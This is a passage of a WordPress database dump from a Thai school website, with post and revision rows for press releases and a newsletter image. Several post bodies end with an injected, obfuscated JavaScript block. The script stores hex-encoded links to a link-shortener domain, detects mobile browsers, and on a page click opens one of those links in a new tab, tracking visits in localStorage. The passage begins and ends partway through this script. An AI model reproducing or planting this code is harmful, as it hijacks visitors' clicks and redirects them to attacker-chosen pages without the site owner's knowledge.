_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข่าวประชาสัมพันธ์','','inherit','closed','closed','','355-revision-v1','','','2024-08-01 15:53:53','2024-08-01 08:53:53','',355,'http://pakhaeng.ssk.in.th/?p=367',0,'revision','',0),
(369,1,'2024-08-01 20:24:02','2024-08-01 13:24:02','<!-- wp:contentviews/grid1 {\"blockId\":\"4bx7msyz\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showCustomField\":false,\"showContent\":false,\"showPagination\":true,\"thumbnailEffect\":\"cveffect-zoomin\",\"responsiveImg\":true,\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"},{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}]} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"bi9dfd8i\",\"whichLayout\":\"layout2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showTaxonomy\":false,\"showCustomField\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":100},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"responsiveImg\":true,\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}]} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข่าวประชาสัมพันธ์','','inherit','closed','closed','','355-revision-v1','','','2024-08-01 20:24:02','2024-08-01 13:24:02','',355,'http://pakhaeng.ssk.in.th/?p=369',0,'revision','',0),
(370,1,'2024-08-01 20:25:51','2024-08-01 13:25:51','','วารสาร1-67','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a31-67','','','2024-08-01 20:25:52','2024-08-01 13:25:52','',0,'http://pakhaeng.ssk.in.th/?p=370',0,'post','',0),
(371,1,'2024-08-01 20:25:31','2024-08-01 13:25:31','','1-67','','inherit','','closed','','1-67','','','2024-08-01 20:25:31','2024-08-01 13:25:31','',370,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-67.png',0,'attachment','image/png',0),
(372,1,'2024-08-01 20:25:51','2024-08-01 13:25:51','','วารสาร1-67','','inherit','closed','closed','','370-revision-v1','','','2024-08-01 20:25:51','2024-08-01 13:25:51','',370,'http://pakhaeng.ssk.in.th/?p=372',0,'revision','',0),
(373,1,'2024-08-01 20:26:53','2024-08-01 13:26:53','<!-- wp:image {\"id\":374,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-67-725x1024.png\" alt=\"\" class=\"wp-image-374\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 